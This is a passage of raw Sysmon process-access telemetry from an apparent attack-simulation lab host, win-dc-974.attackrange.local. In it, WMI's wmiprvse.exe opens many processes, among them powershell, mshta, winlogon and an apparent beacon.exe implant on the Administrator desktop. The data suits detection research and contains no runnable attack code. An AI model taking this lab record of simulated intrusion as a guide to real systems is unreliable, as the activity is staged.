Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF5AECAD49565E156A7A66FE38A19699,SHA256=1E6C7603BC4EE6B368545C6C8D0DE1137994249A996362A92CDBE68998E3BFE2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\S